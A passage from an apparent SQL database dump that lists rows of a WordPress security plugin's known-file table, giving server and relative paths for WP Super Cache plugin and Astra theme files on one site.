(2171, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/src/class-user-agent-info.php', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/src/class-user-agent-info.php'),
(2172, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/src/functions.php', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/src/functions.php'),
(2173, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/ClassLoader.php', 'wp-content/plugins/wp-super-cache/vendor/composer/ClassLoader.php'),
(2174, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/InstalledVersions.php', 'wp-content/plugins/wp-super-cache/vendor/composer/InstalledVersions.php'),
(2175, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/LICENSE', 'wp-content/plugins/wp-super-cache/vendor/composer/LICENSE'),
(2176, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/autoload_classmap.php', 'wp-content/plugins/wp-super-cache/vendor/composer/autoload_classmap.php'),
(2177, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/autoload_namespaces.php', 'wp-content/plugins/wp-super-cache/vendor/composer/autoload_namespaces.php'),
(2178, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/autoload_psr4.php', 'wp-content/plugins/wp-super-cache/vendor/composer/autoload_psr4.php'),
(2179, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/autoload_real.php', 'wp-content/plugins/wp-super-cache/vendor/composer/autoload_real.php'),
(2180, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/autoload_static.php', 'wp-content/plugins/wp-super-cache/vendor/composer/autoload_static.php'),
(2181, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/installed.json', 'wp-content/plugins/wp-super-cache/vendor/composer/installed.json'),
(2182, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/installed.php', 'wp-content/plugins/wp-super-cache/vendor/composer/installed.php'),
(2183, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/platform_check.php', 'wp-content/plugins/wp-super-cache/vendor/composer/platform_check.php'),
(2184, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/wp-cache-base.php', 'wp-content/plugins/wp-super-cache/wp-cache-base.php'),
(2185, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/wp-cache-config-sample.php', 'wp-content/plugins/wp-super-cache/wp-cache-config-sample.php'),
(2186, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/wp-cache-phase1.php', 'wp-content/plugins/wp-super-cache/wp-cache-phase1.php'),
(2187, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/wp-cache-phase2.php', 'wp-content/plugins/wp-super-cache/wp-cache-phase2.php'),
(2188, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/wp-cache.php', 'wp-content/plugins/wp-super-cache/wp-cache.php'),
(2189, '/home/equipm11/public_html/happythinking.com/wp-content/advanced-cache.php', 'wp-content/advanced-cache.php'),
(2190, '/home/equipm11/public_html/happythinking.com/wp-content/cache/index.html', 'wp-content/cache/index.html'),
(2191, '/home/equipm11/public_html/happythinking.com/wp-content/cache/meta/index.html', 'wp-content/cache/meta/index.html'),
(2192, '/home/equipm11/public_html/happythinking.com/wp-content/cache/supercache/index.html', 'wp-content/cache/supercache/index.html'),
(2193, '/home/equipm11/public_html/happythinking.com/wp-content/index.php', 'wp-content/index.php'),
(2194, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/404.php', 'wp-content/themes/astra/404.php'),
(2195, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/SECURITY.md', 'wp-content/themes/astra/SECURITY.md'),
(2196, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/assets/build/dashboard-app-rtl.css', 'wp-content/themes/astra/admin/assets/build/dashboard-app-rtl.css'),
(2197, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/assets/build/dashboard-app.asset.php', 'wp-content/themes/astra/admin/assets/build/dashboard-app.asset.php'),
(2198, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/assets/build/dashboard-app.css', 'wp-content/themes/astra/admin/assets/build/dashboard-app.css'),
(2199, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/assets/build/dashboard-app.js', 'wp-content/themes/astra/admin/assets/build/dashboard-app.js'),
(2200, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/assets/theme-builder/build/index.asset.php', 'wp-content/themes/astra/admin/assets/theme-builder/build/index.asset.php'),
(2201, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/assets/theme-builder/build/index.css', 'wp-content/themes/astra/admin/assets/theme-builder/build/index.css'),
(2202, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/assets/theme-builder/build/index.js', 'wp-content/themes/astra/admin/assets/theme-builder/build/index.js'),
(2203, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/assets/theme-builder/build/index.rtl.css', 'wp-content/themes/astra/admin/assets/theme-builder/build/index.rtl.css'),
(2204, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/class-astra-admin-loader.php', 'wp-content/themes/astra/admin/class-astra-admin-loader.php'),
(2205, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/includes/class-astra-admin-ajax.php', 'wp-content/themes/astra/admin/includes/class-astra-admin-ajax.php'),
(2206, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/includes/class-astra-api-init.php', 'wp-content/themes/astra/admin/includes/class-astra-api-init.php'),
(2207, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/includes/class-astra-menu.php', 'wp-content/themes/astra/admin/includes/class-astra-menu.php'),
(2208, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/admin/includes/class-astra-theme-builder-free.php', 'wp-content/themes/astra/admin/includes/class-astra-theme-builder-free.php'),
(2209, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/archive.php', 'wp-content/themes/astra/archive.php'),
(2210, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/bne-flyout.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/bne-flyout.min-rtl.css'),
(2211, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/bne-flyout.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/bne-flyout.min.css'),
(2212, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/contact-form-7-main.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/contact-form-7-main.min-rtl.css'),
(2213, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/contact-form-7-main.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/contact-form-7-main.min.css'),
(2214, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/contact-form-7.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/contact-form-7.min-rtl.css'),
(2215, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/contact-form-7.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/contact-form-7.min.css'),
(2216, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/divi-builder.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/divi-builder.min-rtl.css'),
(2217, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/divi-builder.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/divi-builder.min.css'),
(2218, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/edd-grid.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/edd-grid.min-rtl.css'),
(2219, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/edd-grid.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/edd-grid.min.css'),
(2220, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/edd.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/edd.min-rtl.css'),
(2221, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/edd.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/edd.min.css'),
(2222, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/gravity-forms.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/gravity-forms.min-rtl.css'),
(2223, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/gravity-forms.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/gravity-forms.min.css'),
(2224, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/learndash.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/learndash.min-rtl.css'),
(2225, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/learndash.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/learndash.min.css'),
(2226, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/lifterlms-flex.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/lifterlms-flex.min.css'),
(2227, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/lifterlms.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/lifterlms.min-rtl.css'),
(2228, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/lifterlms.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/lifterlms.min.css'),
(2229, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/page-builder/bb-plugin.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/page-builder/bb-plugin.min-rtl.css'),
(2230, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/page-builder/bb-plugin.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/page-builder/bb-plugin.min.css'),
(2231, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/page-builder/vc-plugin.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/page-builder/vc-plugin.min-rtl.css'),
(2232, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/page-builder/vc-plugin.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/page-builder/vc-plugin.min.css'),
(2233, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/site-origin.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/site-origin.min-rtl.css'),
(2234, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/site-origin.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/site-origin.min.css'),
(2235, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/sticky-add-to-cart.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/sticky-add-to-cart.min-rtl.css'),
(2236, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/sticky-add-to-cart.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/sticky-add-to-cart.min.css'),
(2237, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-grid.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-grid.min-rtl.css'),
(2238, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-grid.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-grid.min.css'),
(2239, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-layout-grid.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-layout-grid.min-rtl.css'),
(2240, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-layout-grid.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-layout-grid.min.css'),
(2241, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-layout.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-layout.min-rtl.css'),
(2242, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-layout.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-layout.min.css'),
(2243, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-smallscreen-grid.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-smallscreen-grid.min-rtl.css'),
(2244, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-smallscreen-grid.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-smallscreen-grid.min.css'),
(2245, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-smallscreen.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-smallscreen.min-rtl.css'),
(2246, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-smallscreen.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce-smallscreen.min.css'),
(2247, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce.min-rtl.css'),
(2248, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce.min.css', 'wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/woocommerce.min.css'),
(2249, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/customizer-controls.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/customizer-controls.min-rtl.css'),
(2250, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/customizer-controls.min.css', 'wp-content/themes/astra/assets/css/minified/customizer-controls.min.css'),
(2251, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/editor-style.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/editor-style.min-rtl.css'),
(2252, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/editor-style.min.css', 'wp-content/themes/astra/assets/css/minified/editor-style.min.css'),
(2253, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/extend-customizer.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/extend-customizer.min-rtl.css'),
(2254, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/extend-customizer.min.css', 'wp-content/themes/astra/assets/css/minified/extend-customizer.min.css'),
(2255, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/frontend.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/frontend.min-rtl.css'),
(2256, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/frontend.min.css', 'wp-content/themes/astra/assets/css/minified/frontend.min.css'),
(2257, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/galleries.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/galleries.min-rtl.css'),
(2258, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/galleries.min.css', 'wp-content/themes/astra/assets/css/minified/galleries.min.css'),
(2259, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/main-css.min.css', 'wp-content/themes/astra/assets/css/minified/main-css.min.css'),
(2260, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/main.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/main.min-rtl.css'),
(2261, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/main.min.css', 'wp-content/themes/astra/assets/css/minified/main.min.css'),
(2262, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/menu-animation-rtl.min.css', 'wp-content/themes/astra/assets/css/minified/menu-animation-rtl.min.css'),
(2263, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/menu-animation.min.css', 'wp-content/themes/astra/assets/css/minified/menu-animation.min.css'),
(2264, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/style-css.min.css', 'wp-content/themes/astra/assets/css/minified/style-css.min.css'),
(2265, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/style-flex.min.css', 'wp-content/themes/astra/assets/css/minified/style-flex.min.css'),
(2266, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/style.min-rtl.css', 'wp-content/themes/astra/assets/css/minified/style.min-rtl.css'),
(2267, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/style.min.css', 'wp-content/themes/astra/assets/css/minified/style.min.css'),
(2268, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/css/minified/stylesheet.min.css', 'wp-content/themes/astra/assets/css/minified/stylesheet.min.css'),
(2269, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/fonts/astra.svg', 'wp-content/themes/astra/assets/fonts/astra.svg'),
(2270, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/fonts/astra.ttf', 'wp-content/themes/astra/assets/fonts/astra.ttf'),
(2271, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/fonts/astra.woff', 'wp-content/themes/astra/assets/fonts/astra.woff'),
(2272, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/images/astra-starter-sites.jpg', 'wp-content/themes/astra/assets/images/astra-starter-sites.jpg'),
(2273, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/images/license.txt', 'wp-content/themes/astra/assets/images/license.txt'),
(2274, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/add-to-cart-quantity-btn.min.js', 'wp-content/themes/astra/assets/js/minified/add-to-cart-quantity-btn.min.js'),
(2275, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/customizer-controls-toggle.min.js', 'wp-content/themes/astra/assets/js/minified/customizer-controls-toggle.min.js'),
(2276, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/customizer-controls.min.js', 'wp-content/themes/astra/assets/js/minified/customizer-controls.min.js'),
(2277, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/customizer-dependency.min.js', 'wp-content/themes/astra/assets/js/minified/customizer-dependency.min.js'),
(2278, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/assets/js/minified/customizer-preview.min.js'),
(2279, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/extend-customizer.min.js', 'wp-content/themes/astra/assets/js/minified/extend-customizer.min.js'),
(2280, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/flexibility.min.js', 'wp-content/themes/astra/assets/js/minified/flexibility.min.js'),
(2281, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/frontend-pro.min.js', 'wp-content/themes/astra/assets/js/minified/frontend-pro.min.js'),
(2282, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/frontend.min.js', 'wp-content/themes/astra/assets/js/minified/frontend.min.js'),
(2283, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/live-search.min.js', 'wp-content/themes/astra/assets/js/minified/live-search.min.js'),
(2284, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/mobile-cart.min.js', 'wp-content/themes/astra/assets/js/minified/mobile-cart.min.js'),
(2285, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/navigation.min.js', 'wp-content/themes/astra/assets/js/minified/navigation.min.js'),
(2286, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/shop-add-to-cart.min.js', 'wp-content/themes/astra/assets/js/minified/shop-add-to-cart.min.js'),
(2287, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/skip-link-focus-fix.min.js', 'wp-content/themes/astra/assets/js/minified/skip-link-focus-fix.min.js'),
(2288, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/smooth-scroll.min.js', 'wp-content/themes/astra/assets/js/minified/smooth-scroll.min.js'),
(2289, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/sticky-add-to-cart.min.js', 'wp-content/themes/astra/assets/js/minified/sticky-add-to-cart.min.js'),
(2290, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/sticky-sidebar.min.js', 'wp-content/themes/astra/assets/js/minified/sticky-sidebar.min.js'),
(2291, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/style.min.js', 'wp-content/themes/astra/assets/js/minified/style.min.js'),
(2292, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/minified/wp-color-picker-alpha.min.js', 'wp-content/themes/astra/assets/js/minified/wp-color-picker-alpha.min.js'),
(2293, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/add-to-cart-quantity-btn.js', 'wp-content/themes/astra/assets/js/unminified/add-to-cart-quantity-btn.js'),
(2294, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/customizer-controls-toggle.js', 'wp-content/themes/astra/assets/js/unminified/customizer-controls-toggle.js'),
(2295, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/customizer-controls.js', 'wp-content/themes/astra/assets/js/unminified/customizer-controls.js'),
(2296, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/assets/js/unminified/customizer-preview.js'),
(2297, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/extend-customizer.js', 'wp-content/themes/astra/assets/js/unminified/extend-customizer.js'),
(2298, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/flexibility.js', 'wp-content/themes/astra/assets/js/unminified/flexibility.js'),
(2299, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/frontend-pro.js', 'wp-content/themes/astra/assets/js/unminified/frontend-pro.js'),
(2300, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/frontend.js', 'wp-content/themes/astra/assets/js/unminified/frontend.js'),
(2301, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/live-search.js', 'wp-content/themes/astra/assets/js/unminified/live-search.js'),
(2302, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/mobile-cart.js', 'wp-content/themes/astra/assets/js/unminified/mobile-cart.js'),
(2303, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/navigation.js', 'wp-content/themes/astra/assets/js/unminified/navigation.js'),
(2304, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/shop-add-to-cart.js', 'wp-content/themes/astra/assets/js/unminified/shop-add-to-cart.js'),
(2305, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/skip-link-focus-fix.js', 'wp-content/themes/astra/assets/js/unminified/skip-link-focus-fix.js'),
(2306, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/sticky-add-to-cart.js', 'wp-content/themes/astra/assets/js/unminified/sticky-add-to-cart.js'),
(2307, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/sticky-sidebar.js', 'wp-content/themes/astra/assets/js/unminified/sticky-sidebar.js'),
(2308, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/js/unminified/style.js', 'wp-content/themes/astra/assets/js/unminified/style.js'),
(2309, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/svg/ast-social-icons.json', 'wp-content/themes/astra/assets/svg/ast-social-icons.json'),
(2310, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/assets/svg/svgs.json', 'wp-content/themes/astra/assets/svg/svgs.json'),
(2311, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/changelog.txt', 'wp-content/themes/astra/changelog.txt'),
(2312, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/comments.php', 'wp-content/themes/astra/comments.php'),
(2313, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/footer.php', 'wp-content/themes/astra/footer.php');
INSERT INTO `wpou_wfknownfilelist` VALUES
(2314, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/functions.php', 'wp-content/themes/astra/functions.php'),
(2315, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/header.php', 'wp-content/themes/astra/header.php'),
(2316, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/addons/breadcrumbs/assets/js/minified/customizer-preview.min.js'),
(2317, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/addons/breadcrumbs/assets/js/unminified/customizer-preview.js'),
(2318, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/class-astra-breadcrumb-trail.php', 'wp-content/themes/astra/inc/addons/breadcrumbs/class-astra-breadcrumb-trail.php'),
(2319, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/class-astra-breadcrumbs-loader.php', 'wp-content/themes/astra/inc/addons/breadcrumbs/class-astra-breadcrumbs-loader.php'),
(2320, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/class-astra-breadcrumbs-markup.php', 'wp-content/themes/astra/inc/addons/breadcrumbs/class-astra-breadcrumbs-markup.php'),
(2321, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/class-astra-breadcrumbs.php', 'wp-content/themes/astra/inc/addons/breadcrumbs/class-astra-breadcrumbs.php'),
(2322, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-color-configs.php', 'wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-color-configs.php'),
(2323, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-configs.php', 'wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-configs.php'),
(2324, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-typo-configs.php', 'wp-content/themes/astra/inc/addons/breadcrumbs/customizer/class-astra-breadcrumbs-typo-configs.php'),
(2325, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/breadcrumbs/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/addons/breadcrumbs/dynamic-css/dynamic.css.php'),
(2326, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/heading-colors/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/addons/heading-colors/assets/js/minified/customizer-preview.min.js'),
(2327, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/heading-colors/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/addons/heading-colors/assets/js/unminified/customizer-preview.js'),
(2328, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/heading-colors/class-astra-heading-colors-loader.php', 'wp-content/themes/astra/inc/addons/heading-colors/class-astra-heading-colors-loader.php'),
(2329, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/heading-colors/class-astra-heading-colors.php', 'wp-content/themes/astra/inc/addons/heading-colors/class-astra-heading-colors.php'),
(2330, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/addons/heading-colors/customizer/class-astra-heading-colors-configs.php', 'wp-content/themes/astra/inc/addons/heading-colors/customizer/class-astra-heading-colors-configs.php'),
